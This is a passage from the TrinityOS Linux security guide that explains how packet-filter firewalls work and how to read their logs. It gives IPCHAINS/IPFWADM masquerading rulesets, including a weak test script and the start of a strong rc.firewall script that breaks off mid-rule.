filters work, the following should give you a decent start. Please understand that if you don't understand what is being described below, you should probably do a little research on how TCP/IP works. -- Think of a IPFWADM or IPCHAINS ruleset like the following: - All interfaces (any network cards, the localhost interface, etc) on a Linux box have INPUT, OUTPUT, and FORWARD rules. - What is the difference between DENY and REJECT? DENY: If you TELNET to a box that "denies" TELNET traffic, your TELNET will just sit there and seem to try and try and try to connect. Ultimately, the TELNET request will eventually timeout. REJECT: If you TELNET to a box that "rejects" TELNET traffic, your TELNET will almost immeadiately return with a "Connection Refused". This is the normal behavior for a machine that does not SUPPORT telnet access such as stock versions of MS Windows9x, NT, etc. - Why do I prefer REJECT over DENY? If someone connects to your server and you REJECT their traffic, it seems to them as if your computer cannot serve, say, TELNET connections. If you DENY the traffic, then their TELNET traffic just dies and their TELNET client eventually times out. So.. with REJECT, a hacker doesn't know if your machine can or can not do TELNET. With DENY, a hacker KNOWS that you are filtering them. I feel that a REJECT make your box look "dumber". So , lets explain how a packet firewall works with an example: -------------------------------------------------------------- - Say you have a TELNET packet (port 23) from the Internet that wants to reach your Linux box 1) The TELNET packet is sent from the remote computer on the Internet 2) The packet is received on PORT 23 to the INPUT rule on the -External NIC card- 3) If the TELNET packet is matched on the INPUT to allow the packet through: FYI: Some ideas of possible packet firewall rules can include: - source and destination IP addresses - TCP or UDP traffic - specific source and destinatiopn ports (TELNET, etc) - etc Then let the packet IN though the packet firewall. If not matched, the packet is either REJECTED or DENIED. You can also log the fact that this packet was killed. 4) If passed, the TELNET packet then goes to the TELNET daemon on the Linux box to be processed. Once the reply TELNET traffic is generated, the actual return traffic will be returned on a HIGH PORT ( port > 1024 ) and NOT on port 23. If you don't understand this, please read up on TCP/IP fundamentals since this discussion is out of the scope of TrinityOS. For this example, lets say the return TELNET traffic is on port 3200. Now, this return port 3200 traffic is then sent to the OUTPUT filter of the EXTERNAL NIC card. 5) If the packet is matched to allow the packet OUT, then let through. (like #3 above ). If not matched, its either REJECTED or DENIED. You can also log the fact that this packet was killed. 6) Next, if the packet is on a DIFFERENT network than the destination address, the packet needs to be "forwarded". If the rule matches, forward the packet onto the correct network. If not matched, its either REJECTED or DENIED. You can also log the fact that this packet was killed. NOTE: This is is what a "router" does on a basic level. 7) If finally passed, the HIGH PORT packet leaves the Linux box to go over the Internet connection destined to that remote computer. +-------------------------------+ | Linux TCP/IP stack | |_______________________________| | (3) Telnetd Server | {PORT 23} |_______________________________| (Port 3200) (2) +--->| Input: Forward: Output: |-------------+ (4) | +-------------------------------+ | | | | | +------------+ | +------------+ | | Input | | | Output |<--+ | Rule | | | Rule | ^ {PORT 23} | | | | | | (1) +-IN--->| P a s s ? |---+ +--------------| P a s s ? | | | | or | | | or | | ^ |Deny/Reject?| | (5) |Deny/Reject?| | --------- +------------+ | +------+-----+ | *Send* | | | | --------- v Check if packet v | Remote Dump Packet No +---- needs to be Dump Packet | Internet (possibly log it) | forwarded (possibly log it) | site | | | --------- | (6) | Yes | *Received* | | | --------- | v | ^ | +--------------+ +---------------^------+ | {PORT 3200} | | Forward | | Write the packet for | (7) +-----------------------------+ | Rule | | the destination | | | | network address | | | | | Dump Packet <------|Don't Forward?| | Possibly re-write the| (possibly log it) | | |SRC addresses for MASQ| | Forward? | +----------------------+ | or | ^ |FWD & MASQ it |-----------------------+ +--------------+ Now, I want to quickly comment on the use of HIGH TCP/IP ports and what is the difference between a PACKET firewall and a STATEFULLY INSPECTED firewall. -- Though you might let port 23 OUT of your Linux box (TELNET), if you don't also allow ports 1024-65535 back INTO your Linux box, TELNET won't work. Now you might be thinking that letting in ALL high ports back into your Linux box is a BAD thing. You know what? YOUR RIGHT! Realistically, it would be nice to only allow in only the return HIGH ports that you need. This is what the "-k" option in IPFWADM or "! -y" is for IPCHAINS. The problem is, IPFWADM and IPCHAINS aren't smart enough yet to understand all TCP/IP programs such like TELNET, WWW, SSH, etc. So, some programs you can lock down the high ports with the "-k" ir "! -y" options while other programs will have to be configured to allow all 1024-65535 ports in. Bummer huh? So your next question should be "Do others firewalls have this problem?" NO! Why? Because they use a technology called "Stateful Inspection". Stateful firewalls actually listen to ALL network traffic step-by-step to make sure that everything is going 100% correctly. Analogy: packet firewall: A packet firewall only checks for source and destination IP addresses and port numbers. Kinda like a strainer for different colored marbles (if one exists). Stateful Firewall: A stateful firewall not only checks for source and destination IP addresses and port numbers, but it also LISTENS to all TCP/IP communications to make sure that all of the "communications" are following all procedures. Think of it as a realtime grammer and spell checker for "languages" like TELNET, WWW, etc. Hackers try to re-write the "language" to try to break into it, crash it, etc. A stateful firewall will see a given TCP/IP connection running a "language" like TELNET doing weird stuff that it shouldn't be doing and then it simply drops that weird packet. Much better huh? So your next question should be: "I want a statefully inspected firewall and NOT a packet firewall. Where do I get one?!?!" Well.. it doesn't exist... YET. The project has started but it isn't finished yet. If you want to find out more about Statefully Inspected firewalls for Linux, check the URLs in [Section 5] Debugging / Monitoring your firewall ------------------------------------- Once you setup one of the firewalls shown below, you might have some problems getting running or your might be getting strange new messages on the console. What do these messages mean? In the below rulesets, any lines that either DENY or REJECT any traffic also have a "-o" to LOG this firewall hit to the SYSLOG messages file found either in: Redhat: /var/log Slackware: /var/adm If you look at one of these firewall logs, do would see something like: The kernel logs this information looking like: --------------------------------------------------------------------- IPFWADM: Feb 23 07:37:01 Roadrunner kernel: IP fw-in rej eth0 TCP 12.75.147.174:1633 100.200.0.212:23 L=44 S=0x00 I=54054 F=0x0040 T=254 IPCHAINS: Packet log: input DENY eth0 PROTO=17 12.75.147.174:1633 100.200.0.212:23 L=44 S=0x00 I=54054 F=0x0040 T=254 --------------------------------------------------------------------- There is a LOT of information in this just one line. Let break out this example so refer back to the original firewall hit as you read this. Please note that this example is for IPFWADM though it is DIRECTLY readable for IPCHAINS users. NOTE: To understand all the various port numbers, protocol numbers, etc., ***** I recommend you to goto the TOP URL in [Section 5] and get all of the various documents from the IANA and put them in /etc/iana. -------------- - This firewall "hit" occured on: "Feb 23 07:37:01" - This hit was on the "RoadRunner" computer. - This hit occured on the "IP" or TCP/IP protocol - This hit came IN to ("fw-in") the firewall * Other logs can say "fw-out" for OUT or "fw-fwd" for FORWARD - This hit was then "rejECTED". * Other logs can say "deny" or "accept" - This firewall hit was on the "eth0" interface (Internet link) - This hit was a "TCP" packet - This hit came from IP address "12.75.147.174" on return port "1633". - This hit was addressed to "100.200.0.212" to port "23" or TELNET. * If you don't know that port 23 is for TELNET, look at your /etc/services file to see what other ports are used for. - This packet was "44" bytes long - This packet did NOT have any "Type of Service" (TOS) set --Don't worry if you don't understand this.. not required to know * divide this by 4 to get the Type of Service for ipchains users - This packet had the "IP ID" number of "18" --Don't worry if you don't understand this.. not required to know - This packet had a 16bit fragment offset including any TCP/IP packet flags of "0x0000" --Don't worry if you don't understand this.. not required to know * A value that started with "0x2..." or "0x3..." means the "More Fragments" bit was set so more fragmented packet will be coming in to complete this one BIG packet. * A value which started with "0x4..." or "0x5..." means that the "Don't Fragment" bit is set. * Any other values is the Fragment offset (divided by 8) to be later used to recombinw into the original LARGE packet - This packet had a TimeToLive (TTL) of 20. * Every hop over the Internet will subtract (1) from this number. Usually, packets will start with a number of (255) and if that number ever reaches (0), it means that realistically the packet was lost and will be deleted. ***** To better undertand what each firewall hit can mean for your setup, I recommend to check out Robert Gram's WWW site found in [Section 5]. Its well written and gives a blow by blow description of what each port means to you. ***** ********************************************************************************************* So, with basic understanding now, lets get either your MASQing or NON-MASQing Network up! ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++ ++ ++ NOTE: TrinityOS now covers both IPFWADM and IPCHAINS firewall rulesets. ++ ++ -------------------------------------------------------------- ++ ++ ++ ++ In the future, I will be replacing ALL rulesets with a modular ++ ++ system so all Secured IPs will be configured via a seperate file. ++ ++ This will let users update their main firewall rulesets to newer ++ ++ verions without ANY manual customization for their environment. ++ ++ ++ ++ This new system is already designed but I need to finish it up. ++ ++ ++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ - First, you need to make sure you have the "ipfwadm" or "ipchains" firewall programs. To check, run the commmand "whereis ipfwadm" or "whereis ipchains". If its there, you're set. If not, download it from the URL in [Section 5] - Next, create the file /etc/rc.d/rc.firewall Slackware: DELETE the module info in the following IPFWADM ruleset and put it in the /etc/rc.d/rc.modules file instead * VERY IMPORTANT: You should try to implement the following firewall ruleset FIRST! This will allow you to make sure Masquerading works properly FIRST. After your MASQ test is ok, you can try the advanced firewall ruleset below. - NOTE: If you don't plan to use some of these modules, comment or un-comment the various lines (I've commented out cuseeme, irc, quake, and vdolive). Now, edit the following file to use the proper configuration below depending if you are running a 2.2.x+ kernel (IPCHAINS) or a <2.0.x kernel (IPFWADM). ------------------------------------------------------------------------------ All of TrinityOS's step-by-step instructions, files, and scripts are fully scripted out for an automatic installation at: http://www.ecst.csuchico.edu/~dranch/LINUX/TrinityOS-files/TrinityOS-security.tgz ----------------------------------------------------------------------------- ------------------------------------------------------------ The simple (WEAK) firewall ruleset for IPCHAINS or IPFWADM : ------------------------------------------------------------ /etc/rc.d/rc.firewall -- #!/bin/sh # Simple firewall ruleset for both IPCHAINS and IPFWADM # v3.00 echo "Enabling IP MASQ, MASQ timeouts, MASQ modules and simple firewalling" #Load the MASQ modules #BSDComp /sbin/modprobe bsd_comp # echo Loading MASQ modules #/sbin/modprobe ip_masq_cuseeme /sbin/modprobe ip_masq_ftp #/sbin/modprobe ip_masq_irc #/sbin/modprobe ip_masq_quake #/sbin/modprobe ip_masq_vdolive # NOTE: Though Real Audio will work without this module, the data # will be coming in TCP mode vs. UDP mode. With this # module, you can enable UDP mode and possibly clean up # any "glitches" in the sound stream /sbin/modprobe ip_masq_raudio # Finished with MASQ modules #Multicast is a powerful, yet seldom used aspect of TCP/IP for multimedia # data. Though it isn't used much now (because most ISPs don't enable # multicast on their networks, it will be very common in a few more # years. Check out www.mbone.com for more detail. # # NOTE: Adding this feature is OPTIONAL # echo "Adding multicast route.." /sbin/route add -net 224.0.0.0 netmask 240.0.0.0 dev eth0 echo "Enabling IP Masqurading.." echo "1" > /proc/sys/net/ipv4/ip_forward #Note: Redhat users can enable this also by turning the # flag forward flag on in /etc/sysconfig/network # # Change the forward line to # FORWARD_IPV4=true #-------------------------------------------------------------------------- # NOTE: The following simple IPFWADM and IPCHAINS ruleset is purely to # *test* IP MASQ functionality. # # Though this ruleset will work for # ALL users, it WILL NOT give you any good protection from lusers # (security crackers, etc) out on the Internet. Trust me, now that # you are using a UNIX box, you need all the protection you can get! # Once you can confirm that is MASQ working properly, I *HIGHLY* # recommend that you -delete- this simple rc.firewall script and # replace it with the strong IPFWADM or IPCHAINS rulesets shown # later in this section! #--------------------------------------------------------------------- #2.2.x+ kernels with IPCHAINS ONLY # echo " - Setting Policies: IN/OUT is ACCEPT; FWD is reject (poor security; great functionality)" /sbin/ipchains -P input ACCEPT /sbin/ipchains -P output ACCEPT /sbin/ipchains -P forward REJECT echo " - Flushing any old rulesets" /sbin/ipchains -F input /sbin/ipchains -F output /sbin/ipchains -F forward # 2.0.x kernels and IPFWADM users ONLY # #echo " - Setting Policies: IN/OUT is ACCEPT; FWD is reject (poor security; great functionality)" #/sbin/ipfwadm -I -p accept #/sbin/ipfwadm -O -p accpet #/sbin/ipfwadm -F -p reject #echo " - Flushing any old rulesets" #/sbin/ipfwadm -I -f #/sbin/ipfwadm -O -f #/sbin/ipfwadm -F -f echo "Extending MASQ timeouts.." # 2 hrs timeout for TCP session timeouts # 10 sec timeout for traffic after the TCP/IP "FIN" packet is received # 60 sec timeout for UDP traffic (Important for MASQ'ed ICQ users) # # IPCHAINS /sbin/ipchains -M -S 7200 10 60 # # IPFWADM #/sbin/ipfwadm -M -s 7200 10 60 echo "Enable IP Masq.." # #IPCHAINS ipchains -A forward -s 192.168.0.0/24 -j MASQ # #IPFWADM #/sbin/ipfwadm -F -a m -S 192.168.0.0/24 -D 0.0.0.0/0 -W eth0 echo "rc.firewall done." ---- Next, append this to the end of the "/etc/rc.d/rc.local" file All distributions: -- #Run the IP MASQ and firewall script /etc/rc.d/rc.firewall -- - Finally, make the rc.firewall file ROOT executable ONLY chmod 700 /etc/rc.d/rc.firewall Thats it. Once you confirm that IP-MASQ works ok, it is *HIGHLY* recommended to replace the above WEAK rulesets with the below STRONG rulesets. ########################################################################### # MASQ rc.firewall # # # # - There are -3- rulesets listed below: # # # # 1. Strong rc.firewall ruleset for IPCHAINS w/ MASQ support # # # # 2. Strong rc.firewall ruleset for IPFWADM w/ MASQ support # # 3. Strong rc.firewall ruleset for IPFWADM w/o MASQ support for # # single NIC Linux boxes. # # # # # - As mentioned above, once you have confirmed that the initial MASQ # # functionality, You *SHOULD* either create your own strong firewall # # ruleset or use the following TrinityOS firewall ruleset. # # # ########################################################################### *** If you aren't running MASQ, check out the other firewall ruleset that follows this one. *** NOTE: You will have to edit this to allow machines you care about into your machine. All of this is well commented though. NOTE #2: Even if you aren't running MASQ, you should modify these rulesets to suit your needs and APPLY them!!! You DO need some protection from the Internet! ------------------------------------------------------------------------------ All of TrinityOS's step-by-step instructions, files, and scripts are fully scripted out for an automatic installation at: http://www.ecst.csuchico.edu/~dranch/LINUX/TrinityOS-files/TrinityOS-security.tgz ----------------------------------------------------------------------------- +-----------------------------------------------------------------+ | rc.firewall for MASQ setups with a STRONG IPCHAINS RULESET for | | 2.2.x and patched 2.0.x. kernels | +-----------------------------------------------------------------+ CRITICAL NOTE: ALL versions less than 2.2.11 have a IP fragmentation bug. This will make ALL strong IPCHAINS rulesets vunerable! Upgrade NOW! /etc/rc.d/rc.firewall -- #!/bin/sh #-------------------------------------------------------------------- # Author: David A. Ranch FWVER="v3.58" # # ------------------------------------------------------------------- # You can get this file at: # # www.ecst.csuchico.edu/~dranch/LINUX/TrinityOS-files/rc.firewall-trinityos # ------------------------------------------------------------------- # # History: # # v3.58 - 04/15/00 # - Fixed a pretty serious issue if you were trying to enable the explict # input filters for things like DoubleClick, etc. Basically, I was allowing # all internal traffic to get to the Internet before these firewall rules # were being inspected. I have now moved the ALLOW ALL internal firewall # rulesets toward the end of the INPUT section. Thanks to # thomas.stangner@navigon.de for catching this! # # v3.57 - 04/09/00 # - Added some spaces in front of the work "Optional" for prettier output # upon loading. # - I've rearranged the the enabling of FORWARDING -before- the enabling # of MASQUERADING since IPCHAINS complains. # - As of 2.2.12, the IP_ALWAYS_DEFRAG option has been omitted and is now # a /proc configured option. I have now added this to the FORWARD # section. # - Added an echo statment and additional SILENT blocking statements for # SMB traffic on the external interface # # v3.56 - 04/08/00 # - Added the /sbin path to the commented IPCHAINS lines for setting the # TOS bits. # # v3.55 - 03/26/00 # - Grrr.. reversed the DHCPcd issue since the /etc/dhcpc/dhcpcd-INT.exe # script will NOT execute if the IP address hasn't changed from the one # before reboot. I have deleted some of the commented text from the # EXTIP section. Please see the TrinityOS errata section for more details. # # v3.54 - 03/25/00 # - Added filters for the new Shaft DDos tools # # v3.53 - 03/19/00 # - Hopefully caught the last DHCP issue. I've added in the comments # that users who need to use DHCP on their extneral interface SHOULD # not enable nor use the /etc/rc.d/init.d/firewall script. The reason # for this is that the DHCP program will run both the # /etc/dhcpcd/dhcpcd-ethX.exe and the /etc/rc.d/rc.firewall. This # will completely hose the loaded firewall rulesets. I have noted this # in the EXTIP sections comments. # # v3.52 - 03/18/00 # - Finally found a 100% solution for DHCPcd users out there that # get DHCP'ed IP addresses on their external INTERFACE. Changes # in the firewall ruleset are only comments in the top sections # regarding DHCPcd but please see the DHCPcd section in TrinityOS # for full details. # # - Moved the PORTFW variabled to be below the SECUREHOST section # for clarity. # # - Added some comments for PORTFW users on how to allow portfw access # to explict hosts and/or networks. # # - Added two more PORFWIP variabless to the IPCHAINS ruleset # # - Moved the PORFW section from the INPUT section to the FORWARDing # section for better clarity # # - Added a section in the general INPUT section for Squid w/ JunkBuster. # # - Expanded on the DoubleClick filtering example with network numbers from # cwilson@ece.gatech.edu # # v3.51 - 03/05/00 # - Removed a duplicate input filter for spoofed packets, etc. # Interestingly enough, trinityos.wri didn't have the duped line. # Thanks to leo@leobutler.com for the sharp eye. # # - Added a new INPUT section to filter out ANY requests for # specific sites (a form of Net-Nanny, etc). You would use these # filters to block access to given sites. I've explictly shown # disabled examples for doubleclick.net and aol.com. # # v3.50 - 02/26/00 # - Fixed a minor error in the commented Diald line were the $INTLAN # variable needed to have the extra "/24" deleted. Thanks to # jonbir@cogs.susx.ac.uk for reporting this. # # ----------------------------------------------------------------------------- # All changes older than version 3.50 have been moved to the archives available # at: # # http://www.ecst.csuchico.edu/~dranch/LINUX/TrinityOS-old-updates.wri #------------------------------------------------------------------------------ #-------------------------------------------------------------------- # This configuration assumes the following (DSL / Cablemodem setup): # # 1) The external interface is running on "eth0" # 2) The external IP address is dynamically assigned # 3) The internal IP Masqueraded network interface is "eth1" # 4) The internal network is addressed within the private # 192.168.0.x TCP/IP addressing scheme per RFC1918 # # **** # NOTE: All 2.2.x Linux kernels prior to 2.2.11 have a fragmentation # **** bug that renders all strong IPCHAINS rulesets void. It # is CRITICAL that users upgrade the Linux kernel to 2.2.11+ # for proper firewall security. # #-------------------------------------------------------------------- #******************************************************************** # Initializing #******************************************************************** echo -e "\n\nLoading TrinityOS IPCHAINS Firewall $FWVER" echo "----------------------------------------------------------------------" #-------------------------------------------------------------------- # Variables #-------------------------------------------------------------------- # The loopback interface and address # LOOPBACKIF="lo" LOOPBACKIP="127.0.0.1" # External interface device. # # NOTE: PPP and SLIP users will want to replace this interface # with the correct modem interface such as "ppp0" or "sl0" # # For users that might have multiple PPP interfaces, you can # try the following code. You will need to call the firewall # from /etc/ppp/ip-up script with a "$1" appended at the end. # #if [ "x$1" != "x" ]; then # EXTIF=$1 #else # EXTIF="ippp0" #fi # EXTIF="eth0" echo External Interface: $EXTIF # IP address of the external interface # # * # * If you have get a DYNAMIC IP address (regardless if you use PPP # * with a modem or DHCP with Ethernet), you *MUST* make this firewall # * ruleset understand your new IP address everytime you get a new # * IP address. To do this, enable the following one-line script. # * # # (Please note that the different single and double quote characters MATTER). # # NOTE: Red Hat users of DHCP to get TCP/IP addresses (Cablemodems, DSL, etc) # will need to install and use a different DHCP client than the stock # client called "pump". One recommended DHCP client is called "dhcpcd" # and can found in Appendix A. # # The stock Red Hat DHCP client doesn't allow the ability to have scripts # run when DHCP gets a TCP/IP address. Specifically, DHCP delves out # TCP/IP addresses to its clients for a limited amount of time; this # called a "lease". When a DHCP lease expires, the client will query the # DHCP server for a lease renewal. Though the DHCP client will usually # get back its original TCP/IP address, this is NOT always guaranteed. # With this understood, if you receive a different TCP/IP address than # the IPCHAINS firewall was configured for, the firewall will block ALL # network access in and out of the Linux server because that was what it # was configured to do. # # As mentioned above, the key to solve this problem is to use a DHCP # client program that can re-run the /etc/rc.d/init.d/firewall ruleset # once a new TCP/IP address is set. The new ruleset will make the required # changes to the rulesets to allow network traffic from and to your new # TCP/IP address. # # With the dhcpcd program, it will need to executed with the following # command line option to have the firewall ruleset re-run upon every DHCP # lease renew (please note the -c syntax is depreciated in newer DHCPcd # clients). Please see the DHCPcd section in TrinityOS for full details on # how to edit the /sbin/ifup file. # # # Static TCP/IP addressed users: For EXTIP, EXTBROAD, and EXTGW, simply replace # the pipelines with your correct TCP/IP address, broadcast address, and # external gateway, respectively. # # eg: EXTIP="100.200.0.212" # EXTIP=`/sbin/ifconfig | grep -A 4 $EXTIF | awk '/inet/ { print $2 } ' | sed -e s/addr://` if [ "$EXTIP" = '' ]; then echo "Aborting: Unable to determine the IP of $EXTIF ... DHCP or PPP problem?" exit 1 fi echo External IP: $EXTIP # Broadcast address of the external network # # Static TCP/IP addressed users: # # Simply delete all of the text and including the single quotes and # replace it with your correct TCP/IP netmask enclosed in double # quotes. # # eg: EXTBROAD="100.200.0.255" # EXTBROAD=`/sbin/ifconfig | grep -A 1 $EXTIF | awk '/Bcast/ { print $3 }' | sed -e s/Bcast://` echo External broadcast: $EXTBROAD # Gateway for the external network # # Static TCP/IP addressed users: # # Simply delete all of the text and including the single quotes and # replace it with your correct TCP/IP default gateway or "next hop # address". # # eg: DGW="100.200.0.1" # EXTGW=`/sbin/route -n | grep -A 4 UG | awk '{ print $2}'` echo Default GW: $EXTGW echo " --- " # Internal interface device. INTIF="eth1" echo Internal Interface: $INTIF # IP address on the internal interface INTIP="192.168.0.1" echo Internal IP: $INTIP # IP network address of the internal network INTLAN="192.168.0.0/24" echo Internal LAN: $INTLAN echo " --- " # IP Mask for all IP addresses UNIVERSE="0.0.0.0/0" # IP Mask for broadcast transmissions BROADCAST="255.255.255.255" # Specification of the high unprivileged IP ports. UNPRIVPORTS="1024:65535" # Specification of X Window System (TCP) ports. XWINDOWS_PORTS="6000:6010" # The TCP/IP address of your slave DNS servers (if any). # This is OPTIONAL! # # Disabled by default. #SECONDARYDNS="10.200.200.69" #echo Secondary DNS IP: $SECONDARYDNS # The TCP/IP addresses of a specifically allowed EXTERNAL hosts # # NOTE: If you want to allow in an ENTIRE NETWORK, let the # last octet of the network be a .0 and add the netmask. # i.e.: # SECUREHOST="200.244.0.0/26" # # Disabled by default. # #SECUREHOST="200.244.0.40" #echo Secure Host1 IP: $SECUREHOST #SECUREHOST2="200.244.0.41" #echo Secure Host2 IP: $SECUREHOST2 #SECUREHOST3="200.244.0.42" #echo Secure Host3 IP: $SECUREHOST3 #SECUREHOST4="200.244.0.43" #echo Secure Host4 IP: $SECUREHOST4 # IP Port Forwarded Addresses # # Port forwarding allows external traffic to directly connect to an INTERNAL # Masq'ed machine. An example need for port forwarding is the need for external # users to directly contact a WWW server behind the MASQ server. # # To enable portfw, you need to un-# out and edit the lines above for one or # more SECUREHOSTs. You then need to un-# out the PORTFW in the FORWARD # sections of later in the ruleset. # # If you want to simply portfw one explict host, it should be configured via a # SECUREHOST option above. If this PORTFW'ed port should be available for ALL # hosts on the Inet, it should be opened up in the INPUT section much like for # HTTP, Sendmail, etc. # # NOTE: Port forwarding is well beyond the scope of this documentation to # explain the security issues implied in opening up access like this. # Please see Appendix A to find the IP-MASQ-HOWTO for a full explanation. # # Disabled by default. # #PORTFWIP1="192.168.0.20" #echo PortFW1 IP: $PORTFWIP1 #PORTFWIP2="192.168.0.20" #echo PortFW2 IP: $PORTFWIP2 #PORTFWIP3="192.168.0.20" #echo PortFW3 IP: $PORTFWIP3 # TCP/IP addresses of INTENRAL hosts network allowed to directly # connect to the Linux server. All internal hosts are allowed # per default. # # Disabled by default #HOST1IP="192.168.0.10" #echo Internal Host 1 IP: $HOST1IP #HOST2IP="192.168.0.11" #echo Internal Host 2 IP: $HOST2IP # Logging state. # # Uncomment the " " line and comment the "-l" line if you want to # disable logging of some of more important the IPCHAINS rulesets. # # The output of this logging can be found in the /var/log/messages # file. It is recommended that you leave this setting enabled. # If you need to reduce some of the logging, edit the rulesets and # delete the "$LOGGING" syntax from the ruleset that you aren't # interested in. # # LOGGING=" " LOGGING="-l" echo " --- " echo "----------------------------------------------------------------------" #-------------------------------------------------------------------- # Debugging Section #-------------------------------------------------------------------- # If you are having problems with the firewall, uncomment the lines # below and then re-run the firewall to make sure that the firewall # is not giving any errors, etc. The output of this debugging # script will be in a file called /tmp/rc.firewall.dump #-------------------------------------------------------------------- # #echo " - Debugging." #echo Loopback IP: $LOOPBACKIP > /tmp/rc.firewall.dump #echo Loopback interface name: $LOOPBACKIF >> /tmp/rc.firewall.dump #echo Internal interface name: $INTIF >> /tmp/rc.firewall.dump #echo Internal interface IP: $INTIP >> /tmp/rc.firewall.dump #echo Internal LAN address: $INTLAN >> /tmp/rc.firewall.dump #echo ----------------------------------------------------- >> /tmp/rc.firewall.dump #echo External interface name: $EXTIF >> /tmp/rc.firewall.dump #echo External interface IP: $EXTIP >> /tmp/rc.firewall.dump #echo External interface broadcast IP: $EXTBROAD >> /tmp/rc.firewall.dump #echo External interface default gateway: $EXTGW >> /tmp/rc.firewall.dump #echo ----------------------------------------------------- >> /tmp/rc.firewall.dump #echo External secondary DNS: $SECONDARYDNS >> /tmp/rc.firewall.dump #echo External secured host: $SECUREHOST >> /tmp/rc.firewall.dump #-------------------------------------------------------------------- # General #-------------------------------------------------------------------- # Performs general processing such as setting the multicast route # and DHCP address hacking. # # Multicast is a powerful, yet seldom used aspect of TCP/IP for multimedia # data. Though it isn't used much now (because most ISPs don't enable multicast # on their networks, it will be very common in a few more years. Check out # www.mbone.com for more detail. # # Adding this feature is OPTIONAL. # # Disabled by default. #echo " - Adding multicast route." #/sbin/route add -net 224.0.0.0 netmask 240.0.0.0 dev $EXTIF # Disable IP spoofing attacks. # # This drops traffic addressed for one network though it is being received on a # different interface. # echo " - Disabling IP Spoofing attacks." for file in /proc/sys/net/ipv4/conf/*/rp_filter do echo "2" > $file done # Comment the following out of you are not using a dynamic address # echo " - Enabling dynamic TCP/IP address hacking." echo "1" > /proc/sys/net/ipv4/ip_dynaddr #-------------------------------------------------------------------- # Type of Service (TOS) Settings #-------------------------------------------------------------------- # Though very FEW ISPs do anything with the TOS bits, I thought you'd # like to see it. In therory, you can tell the Internet how to handle # your traffic, be it sensitive to delay, throughput, etc. # # -t 0x01 0x10 = Minimum Delay # -t 0x01 0x08 = Maximum Throughput # -t 0x01 0x04 = Maximum Reliability # -t 0x01 0x02 = Minimum Cost # # Example: # # Settings for FTP, SSH, and TELNET # /sbin/ipchains -A output -p tcp -d 0/0 21:23 -t 0x01 0x10 # # Settings for WWW # /sbin/ipchains -A output -p tcp -d 0/0 80 -t 0x01 0x10 #-------------------------------------------------------------------- # Masquerading Timeouts #-------------------------------------------------------------------- # Set timeout values for masq sessions (seconds). # # Item #1 - 2 hrs timeout for TCP session timeouts # Item #2 - 10 sec timeout for traffic after the TCP/IP "FIN" packet is received # Item #3 - 60 sec timeout for UDP traffic # # Note to ICQ users: You might want to set the UDP timeout to something # like 160. # echo " - Changing IP masquerading timeouts." /sbin/ipchains -M -S 7200 10 60 #-------------------------------------------------------------------- # Masq Modules #-------------------------------------------------------------------- # Most TCP/IP-enabled applications work fine behind a Linux IP # Masquerade server. But, some applications need a special # module to get their traffic in and out properly. # # Note: Some applications do NOT work though IP Masquerade server at ALL such # as any H.323-based program. Please the IP-MASQ HOWTO for more details. # # Note #2: Only uncomment the modules that you REQUIRE to be loaded. # The FTP module is loaded by default. #-------------------------------------------------------------------- echo " - Loading masquerading modules." #/sbin/modprobe ip_masq_cuseeme /sbin/modprobe ip_masq_ftp #/sbin/modprobe ip_masq_irc #/sbin/modprobe ip_masq_quake #/sbin/modprobe ip_masq_raudio #/sbin/modprobe ip_masq_vdolive #-------------------------------------------------------------------- # Default Policies #-------------------------------------------------------------------- # Set all default policies to REJECT and flush all old rules. #-------------------------------------------------------------------- # Change default policies to REJECT. # # We want to only EXPLICTLY allow what traffic is allowed IN and OUT of the # firewall. All other traffic will be implicitly blocked. # echo " - Set default policies to REJECT" /sbin/ipchains -P input REJECT /sbin/ipchains -P output REJECT /sbin/ipchains -P forward REJECT echo " - Flushing all old rules and setting all default policies to REJECT " # Flush all old rulesets # /sbin/ipchains -F input /sbin/ipchains -F output /sbin/ipchains -F forward #******************************************************************** # Input Rules #******************************************************************** echo "----------------------------------------------------------------------" echo "Input Rules:" #-------------------------------------------------------------------- # Incoming Traffic on the Internal LAN #-------------------------------------------------------------------- # This section controls the INPUT traffic allowed to flow within the internal # LAN. This means that all input traffic on the local network is valid. If # you want to change this default setting and only allow certain types of # traffic within your internal network, you will need to comment this following # line and configure individual ACCEPT lines for each TCP/IP address you want # to let through. A few example ACCEPT lines are provided below for # demonstration purposes. # # Sometimes it is useful to allow TCP connections in one direction but not the # other. For example, you might want to allow connections to an external HTTP # server but not connections from that server. The naive approach would be to # block TCP packets coming from the server. However, the better approach is to # use the -y flag which will block only the packets used to request a # connection. #-------------------------------------------------------------------- echo " - Setting input filters for traffic on the internal LAN." # DHCP Server. # # If you have configured a DHCP server on the Linux machine to serve IP # addresses to the internal network, you will need to enable this section. # # This is an example of how to let input traffic flow through the local # LAN if we have rejected all prior requests above. # # Disabled by default # echo " Optional parameter: DHCPd server" #/sbin/ipchains -A input -j ACCEPT -i $INTIF -p udp -s $UNIVERSE bootpc -d $BROADCAST/0 bootps #/sbin/ipchains -A input -j ACCEPT -i $INTIF -p tcp -s $UNIVERSE bootpc -d $BROADCAST/0 bootps #-------------------------------------------------------------------- # Explicit Access from Internal LAN Hosts #-------------------------------------------------------------------- # This section is provided as an example of how to allow only SPECIFIC hosts on # the internal LAN to access services on the firewall server. Many people # might feel that this is extreme but many system attacks occur from the # INTERNAL networks. # # Examples given allow access via FTP, FTP-DATA, SSH, and TELNET. # # In order for this ruleset to work, you must first comment out the generic # allow lines just above the final ALLOW HIGH PORTS at the end of this section. # That line provides full access to the internal LAN by all internal hosts. You will # then need to enable the lines below to allow any access at all. #-------------------------------------------------------------------- #echo " - Setting input filters for specific internal hosts." # First allowed internal host to connect directly to the Linux server # # Disabled by default. #/sbin/ipchains -A input -j ACCEPT -i $INTIF -p tcp -s $HOST1IP -d $INTIP ftp #/sbin/ipchains -A input -j ACCEPT -i $INTIF -p tcp -s $HOST1IP -d $INTIP ftp-data #/sbin/ipchains -A input -j ACCEPT -i $INTIF -p tcp -s $HOST1IP -d $INTIP ssh #/sbin/ipchains -A input -j ACCEPT -i $INTIF -p tcp -s $HOST1IP -d $INTIP telnet # Second allowed internal host to connect directly to the Linux server # # Disabled by default. #/sbin/ipchains -A input -j ACCEPT -i $INTIF -p tcp -s $HOST2IP -d $INTIP ftp #/sbin/ipchains -A input -j ACCEPT -i $INTIF -p tcp -s $HOST2IP -d $INTIP ftp-data #/sbin/ipchains -A input -j ACCEPT -i $INTIF -p tcp -s $HOST2IP -d $INTIP 